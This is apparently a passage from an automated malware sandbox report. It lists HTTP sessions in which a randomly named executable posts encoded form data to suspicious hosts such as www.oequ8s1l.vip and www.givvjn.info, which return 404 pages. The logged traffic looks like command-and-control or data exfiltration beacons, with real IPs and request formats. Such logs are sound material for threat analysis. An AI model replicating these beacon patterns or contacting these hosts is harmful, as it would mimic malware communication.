6b 74 4b 4f 2b 48 68 41 4e 6c 76 67 39 56 70 68 61 2f 4a 6d 79 31 70 43 51 51 46 33 64 51 65 62 51 6c 67 6c 31 68 49 53 67 58 6a 61 47 65 56 77 31 6b 49 45 73 31 39 78 77 55 53 53 37 71 56 53 44 77 79 4a 59 6a 2f 48 62 79 6e 7a 6a 4e 38 6c 6a 67 72 4f 61 35 59 49 59 64 75 78 38 77 56 4c 53 63 75 61 35 42 32 46 50 6c 5a 71 53 48 64 51 44 30 38 6a 75 6d 70 48 2f 79 6d 65 73 57 62 37 6d 70 57 4b 45 32 43 41 57 2f 67 51 43 35 6e 6b 39 66 53 59 6e 6a 78 45 50 63 4d 50 43 55 61 4d 76 64 56 31 6b 33 2f 31 73 30 30 57 33 61 39 54 52 5a 65 37 38 50 37 6a 73 57 41 63 51 37 34 2f 53 51 34 30 [TRUNCATED] Data Ascii: BXc8V=iD9eRJpTh5CO4tDW+jRXUFoNvEG8DQmnU+ShKgEx/hkV3UgopVMKnH+PCfD2fioxftfRFkaSZd7nOykEz35t1rX95aEzh4qz6V8OGvnipN3+rT7kM/SrZwCUOR/nC+HCsFjiHYPgktKO+HhANlvg9Vpha/Jmy1pCQQF3dQebQlgl1hISgXjaGeVw1kIEs19xwUSS7qVSDwyJYj/HbynzjN8ljgrOa5YIYdux8wVLScua5B2FPlZqSHdQD08jumpH/ymesWb7mpWKE2CAW/gQC5nk9fSYnjxEPcMPCUaMvdV1k3/1s00W3a9TRZe78P7jsWAcQ74/SQ40dpnemuqnJG/8L0e553nLHHRNp6gNHyk1E2MLCCq76VA8LbROk99MzRehSivjkf+sWfQy+EypKwstTByncDJhPdiXvGHmJn57MTyAk7GyKqvt2y4VL8O6byz9c3GdMqHtJ94H0SVJQ/iUr9H039LpD0BazsjYdASxgYuarDT1twNQbevUs2vBLFLVWjh04Zdog2l9pmJLys6F5WEElYYcnkVeXznTEkCePLFg4un405V+sfMCk8vVlG4IbpxETYnmYjnSeL1dkPCqWBE65hicN8Tva8YRJVnh1CZFHgsgnux9kAcNoHb9ffN0Rtg9/Hawo1bQcGA8VbAqvqRV5FEZDME8EpoH5eGXosmYXjTUVv2VCMpbqP+fh7TMKkMp4Uzo4vBu/NZqdVO+h6rivVcUNFDgLiUxMpLO1qe2W8AYMlJdaJa864kFvaZniYT+K/dmuKFifqKDtRxNILB6V60sWkY45sUl5lJLwFr8v7Qhlp8BC4gpt930xCH7gDG8VvSPFb/nD5v4PQ8g8JZcHqT3TMIChyDoZiHELMOYMseTFPTjVXNT+1PvZcDhYJbnmjPrtF56ugaEm52XqvNTRpwiCiNWLyViKxVkRDKNvCwR5rzdscrnu2yl7rAsIfoREOOkVCU0YofBP/TynfjjFsznP0inw7uVXe14nA [TRUNCATED]
Jan 16, 2025 09:24:05.628176928 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 08:24:05 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49992	47.83.1.90	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:06.697613001 CET	480	OUT	GET /e4zw/?BXc8V=vBV+S5Q8h7Cl09PJqQteIVoPn0WMDxyCQPiiXTQrjiV2j0wk8nAmuATUOuyLShoOecv/N06oacatEhkR7UdQnNX8vYYfl5KO9EIWGMCepu/511PNPsKoGB8=&f898=D4YHodiH3rXTfZ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1
Jan 16, 2025 09:24:08.157059908 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Thu, 16 Jan 2025 08:24:07 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50012	149.104.185.93	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:15.539639950 CET	741	OUT	POST /izrj/ HTTP/1.1 Host: www.oequ8s1l.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 202 Cache-Control: no-cache Connection: close Origin: http://www.oequ8s1l.vip Referer: http://www.oequ8s1l.vip/izrj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 37 63 4d 53 4e 44 39 54 38 2f 34 67 50 4e 69 51 56 78 6e 72 6b 35 75 58 36 74 36 39 4a 6a 67 4b 73 4e 77 62 39 70 6e 4e 73 6e 79 6b 57 46 61 6d 38 6a 74 67 78 38 4f 6f 31 2b 50 2f 42 69 69 65 76 52 46 61 41 76 63 46 78 30 69 75 47 56 56 46 56 36 6b 39 45 41 35 65 46 41 61 63 52 6b 4d 6e 53 46 7a 43 6c 50 76 56 47 65 66 37 4a 36 43 33 49 46 4c 77 57 2b 64 48 77 48 70 44 5a 47 46 72 77 36 38 78 42 6e 4e 59 6d 42 77 69 48 50 44 34 69 56 4b 65 69 30 43 47 4b 61 4a 39 71 39 39 52 32 66 4a 76 2f 66 74 69 41 36 54 72 73 44 71 6d 4b 6c 4e 6d 6d 39 53 4d 66 6f 4a 66 35 4a 61 51 67 3d 3d Data Ascii: BXc8V=u7cMSND9T8/4gPNiQVxnrk5uX6t69JjgKsNwb9pnNsnykWFam8jtgx8Oo1+P/BiievRFaAvcFx0iuGVVFV6k9EA5eFAacRkMnSFzClPvVGef7J6C3IFLwW+dHwHpDZGFrw68xBnNYmBwiHPD4iVKei0CGKaJ9q99R2fJv/ftiA6TrsDqmKlNmm9SMfoJf5JaQg==
Jan 16, 2025 09:24:16.411995888 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:16 GMT Content-Type: text/html Content-Length: 7932 Connection: close Set-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ ETag: "6785cace-1efc" Server: nginx Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 57 20 57 41 46 43 44 4e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 43 68 72 6f 6d 65 3d 31 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 63 73 73 20 72 65 73 65 74 20 73 74 61 72 74 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f [TRUNCATED] Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>NEW WAFCDN 404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style type="text/css"> /css reset start/ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; [TRUNCATED]
Jan 16, 2025 09:24:16.412044048 CET	224	IN	Data Raw: 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e Data Ascii: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } article, aside, details, figcaption, figure, foot
Jan 16, 2025 09:24:16.412137985 CET	1236	IN	Data Raw: 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: er, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } blockquote
Jan 16, 2025 09:24:16.412172079 CET	1236	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e Data Ascii: ont-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and (min-widt
Jan 16, 2025 09:24:16.412208080 CET	1236	IN	Data Raw: 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 7d 0a 20 20 20 20 20 Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
Jan 16, 2025 09:24:16.412244081 CET	672	IN	Data Raw: 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 74 70 Data Ascii: n-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-cn{margin
Jan 16, 2025 09:24:16.412276030 CET	1236	IN	Data Raw: e9 a1 b5 e9 9d a2 e9 94 99 e8 af af 20 21 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 2d 74 69 70 73 2d Data Ascii: !</span> </div> <div class="err-tips-en">Unknown Virtual Host</div> <div class="img-line"> </div> <div class="host-info">
Jan 16, 2025 09:24:16.412354946 CET	439	IN	Data Raw: 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 57 69 64 74 68 20 3e 20 31 33 36 36 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: ment.body.clientWidth; if (windWidth > 1366) { document.body.className = ""; } else if (windWidth > 991 && windWidth <= 1366) { document.body.className = "w992";
Jan 16, 2025 09:24:16.412384987 CET	632	IN	Data Raw: 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 22 77 35 32 31 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 57 69 64 74 68 20 3e 20 33 32 30 20 26 26 20 77 Data Ascii: document.body.className = "w521"; } else if (windWidth > 320 && windWidth <= 520) { document.body.className = "w321"; } else { document.body.className = "lt-w320";

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50013	149.104.185.93	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:18.097342968 CET	761	OUT	POST /izrj/ HTTP/1.1 Host: www.oequ8s1l.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 222 Cache-Control: no-cache Connection: close Origin: http://www.oequ8s1l.vip Referer: http://www.oequ8s1l.vip/izrj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 37 63 4d 53 4e 44 39 54 38 2f 34 67 76 39 69 63 55 78 6e 36 30 35 70 4a 71 74 36 32 70 6a 38 4b 73 78 77 62 2f 45 73 4e 65 7a 79 6b 79 56 61 6e 2b 62 74 6e 78 38 4f 6e 56 2b 4f 79 68 6a 67 65 76 63 77 61 46 76 63 46 31 63 69 75 44 52 56 46 47 43 6e 2f 55 41 37 53 6c 41 63 44 42 6b 4d 6e 53 46 7a 43 6c 61 4b 56 43 79 66 37 35 71 43 33 70 46 49 35 32 2b 53 41 77 48 70 48 5a 48 4d 72 77 36 65 78 45 2b 71 59 6c 70 77 69 47 66 44 34 7a 56 4c 58 69 30 2b 46 36 61 62 34 49 38 57 5a 30 53 57 75 2f 4c 38 38 7a 6d 53 71 71 4f 77 33 37 45 61 30 6d 5a 68 52 59 68 39 53 36 30 54 4c 71 58 4d 59 36 6b 63 5a 72 56 6d 34 64 43 38 32 2f 33 6e 74 77 55 3d Data Ascii: BXc8V=u7cMSND9T8/4gv9icUxn605pJqt62pj8Ksxwb/EsNezykyVan+btnx8OnV+OyhjgevcwaFvcF1ciuDRVFGCn/UA7SlAcDBkMnSFzClaKVCyf75qC3pFI52+SAwHpHZHMrw6exE+qYlpwiGfD4zVLXi0+F6ab4I8WZ0SWu/L88zmSqqOw37Ea0mZhRYh9S60TLqXMY6kcZrVm4dC82/3ntwU=
Jan 16, 2025 09:24:18.972865105 CET	215	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:18 GMT Content-Type: text/html Content-Length: 7932 Connection: close Set-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ ETag: "6785cace-1efc" Server: nginx
Jan 16, 2025 09:24:18.972913980 CET	1236	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>NEW WAFCDN 404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-s
Jan 16, 2025 09:24:18.972951889 CET	1236	IN	Data Raw: 20 20 20 20 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none; } b
Jan 16, 2025 09:24:18.972987890 CET	1236	IN	Data Raw: 70 3a 20 32 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 35 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6d 67 2d 6c 69 6e 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 7d 0a 20 20 20 20 Data Ascii: p: 22px;font-size: 55px;color:#666;} .img-line{margin-top: 10px;} .host-info{margin-top: 10px;color: #666;font-size: 18px;font-weight: 200;} .host-info-mar{margin-left: 20px;} @media screen and
Jan 16, 2025 09:24:18.973023891 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 23 74 70 69 73 5f 63 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 Data Ascii: #err_code{font-size: 60px;} #tpis_cn{font-size: 30px;} .err-tips-en{font-size: 25px;} .host-info{font-size: 15px;} } @media screen and (max-width:359px){
Jan 16, 2025 09:24:18.973057985 CET	896	IN	Data Raw: 2d 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 35 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 77 33 32 31 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -cn{margin-top: 250px;} .w321 #err_code{font-size: 60px;} .w321 #tpis_cn{font-size: 30px;} .w321 .err-tips-en{font-size: 25px;} .w321 .host-info{font-size: 15px;} .lt-w320 .err-tips-
Jan 16, 2025 09:24:18.973093033 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 Data Ascii: </div> </div> </div> <script type="text/javascript"> var ie = window.ActiveXObject ? true : false; var ie8 = (ie && document.documentMode <= 8) ? true : f
Jan 16, 2025 09:24:18.973129034 CET	856	IN	Data Raw: 6c 61 73 73 4e 61 6d 65 20 3d 20 22 77 39 39 32 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 77 69 6e 64 57 69 64 74 68 20 3e 20 37 36 38 20 26 26 20 77 69 6e 64 57 69 64 74 68 20 3c 3d 20 39 39 31 29 Data Ascii: lassName = "w992"; } else if (windWidth > 768 && windWidth <= 991) { document.body.className = "w769"; } else if (windWidth > 520 && windWidth <= 768) { document.body.clas

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50014	149.104.185.93	80	5600	C:\Program Files (x86)\YIUoDKDalyNySmUaBEWPfRGPQysDByVsVJAZfqYZkMSLQRyciXgWRUw\cvSKtqilyhlQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 09:24:20.652053118 CET	10843	OUT	POST /izrj/ HTTP/1.1 Host: www.oequ8s1l.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Cache-Control: no-cache Connection: close Origin: http://www.oequ8s1l.vip Referer: http://www.oequ8s1l.vip/izrj/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.0 AOL/9.7 AOLBuild/4343.3038.US Safari/537.1 Data Raw: 42 58 63 38 56 3d 75 37 63 4d 53 4e 44 39 54 38 2f 34 67 76 39 69 63 55 78 6e 36 30 35 70 4a 71 74 36 32 70 6a 38 4b 73 78 77 62 2f 45 73 4e 66 4c 79 6c 41 64 61 6d 5a 33 74 6d 78 38 4f 75 31 2b 4c 79 68 6a 68 65 72 34 30 61 46 71 68 46 7a 59 69 75 68 5a 56 52 6e 43 6e 32 55 41 37 49 46 41 5a 63 52 6b 64 6e 57 59 34 43 6c 4b 4b 56 43 79 66 37 37 43 43 77 34 46 49 31 57 2b 64 48 77 48 66 44 5a 47 70 72 77 69 6b 78 46 76 64 59 56 4a 77 6a 6d 76 44 30 68 39 4c 4c 79 30 47 41 36 62 49 34 49 77 4a 5a 30 2b 61 75 2f 2f 57 38 30 4f 53 70 73 6e 42 67 50 55 43 70 31 39 66 53 71 56 72 64 62 6b 78 54 72 48 34 65 62 73 6e 62 6f 46 36 31 39 50 71 6d 65 6d 6a 33 56 76 35 32 33 44 4b 47 50 71 6c 30 49 6d 54 58 41 59 46 7a 66 67 5a 78 51 37 4a 2f 6a 63 48 77 4e 58 35 65 49 30 4c 35 77 79 4e 33 74 4e 31 74 70 65 6a 64 4e 4e 42 2b 70 7a 53 4a 69 31 50 4f 34 7a 4f 63 53 4a 7a 4d 74 66 53 6e 59 35 67 65 43 46 6f 75 54 50 4a 6b 37 7a 75 7a 67 6e 4e 56 55 30 74 77 68 30 42 42 73 63 56 64 65 37 33 42 2b 62 65 74 39 50 45 [TRUNCATED] Data Ascii: BXc8V=u7cMSND9T8/4gv9icUxn605pJqt62pj8Ksxwb/EsNfLylAdamZ3tmx8Ou1+Lyhjher40aFqhFzYiuhZVRnCn2UA7IFAZcRkdnWY4ClKKVCyf77CCw4FI1W+dHwHfDZGprwikxFvdYVJwjmvD0h9LLy0GA6bI4IwJZ0+au//W80OSpsnBgPUCp19fSqVrdbkxTrH4ebsnboF619Pqmemj3Vv523DKGPql0ImTXAYFzfgZxQ7J/jcHwNX5eI0L5wyN3tN1tpejdNNB+pzSJi1PO4zOcSJzMtfSnY5geCFouTPJk7zuzgnNVU0twh0BBscVde73B+bet9PE+Z1QIYJkrEn/pJzKt3BNCF43OgqKj3d7AVoxs5oW2NeszCDGnZxMEJN/xvAEVAS7QaDXhu/tNNAfMDhrL2TUi3wUDoNfaBGCdyNR8NdDsPZrRErr7iV5JDxfFwMRk2CiQmseu3GSWwc60NNlQjll/lsQ8rHNhp16nwV+0irwypUFhb+jLCcjQSnV8exlP8Z1eMtRZmtIlHdlPHmXHz5lynbrA1xEdmj0jxUlNkb/+n/+wAJAwg8NWUeKlL2fhfQuSk24duO562RUDsqWJifad6iJzpd8D/b/CdbFgYCslrfLw7ndgKTySue3mcUIw+JYyTb7DRDc4LnCJT6JiQNHm6Dx8zcmDS+Dh3EZSOSOdzIHth5z842P3G4j8QW97fQdXCruBQB1QdO2tRHoqx+3ZdoTQxeZ8quavElTvjGhqhtqylMFniecb7YA9jDlMKobLnT8+H4zOZYkAykd4T0Y30oLcATQlDSKbwO5JQtZBkghfQrtM2Wj4zaqMLWC1o5fYTDu0ww9r67+uSK54NLpKHp8yRHagKCfF+1StWo7fKrtlaqcThBuORBqdHuZ+39rJLmQYi8yGv36bUcATI7e6As1bisUsScf5Mif5HRhbyuG6pT9kqbH/tYKnLPjMs0nv5rrcqDQ69FieXd0Vyv6oHeRJv9PS/VhtE [TRUNCATED]
Jan 16, 2025 09:24:21.515686035 CET	215	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 08:24:21 GMT Content-Type: text/html Content-Length: 7932 Connection: close Set-Cookie: X-SUDUN-WAF-R-C=0001696304; path=/ ETag: "6785cace-1efc" Server: nginx
Jan 16, 2025 09:24:21.515774965 CET	1236	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 45 Data Ascii: <!doctype html><html> <head> <meta charset="utf-8"> <title>NEW WAFCDN 404</title> <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"/> <meta name="viewport" content="width=device-width, initial-s
Jan 16, 2025 09:24:21.515877962 CET	224	IN	Data Raw: 20 20 20 20 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a Data Ascii: footer, header, hgroup, menu, nav, section { display: block; } body { line-height: 1; } ol, ul { list-style: none;
Jan 16, 2025 09:24:21.515888929 CET	1236	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 20 71 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 71 75 6f 74 65 73 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 Data Ascii: } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; }
Jan 16, 2025 09:24:21.515901089 CET	1236	IN	Data Raw: 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 31 33 36 36 70 78 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 65 72 72 2d Data Ascii: @media screen and (min-width:992px) and (max-width:1366px){ .err-tips-cn{margin-top: 200px;} #err_code{font-size: 120px;} #tpis_cn{font-size: 40px;} .err-tips-en{font-size: 35px;
Jan 16, 2025 09:24:21.515912056 CET	1236	IN	Data Raw: 6d 61 78 2d 77 69 64 74 68 3a 33 35 39 70 78 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 65 72 72 2d 74 69 70 73 2d 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: max-width:359px){ .err-tips-cn{margin-top: 200px;} #err_code{font-size: 50px;} #tpis_cn{font-size: 25px;} .err-tips-en{font-size: 20px;} .host-info{font-size: 10px
Jan 16, 2025 09:24:21.515923023 CET	1236	IN	Data Raw: 2e 6c 74 2d 77 33 32 30 20 2e 65 72 72 2d 74 69 70 73 2d 63 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 30 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6c 74 2d 77 33 32 30 20 23 65 72 72 5f 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 Data Ascii: .lt-w320 .err-tips-cn{margin-top: 200px;} .lt-w320 #err_code{font-size: 50px;} .lt-w320 #tpis_cn{font-size: 25px;} .lt-w320 .err-tips-en{font-size: 20px;} .lt-w320 .host-info{font-size: 10px;}
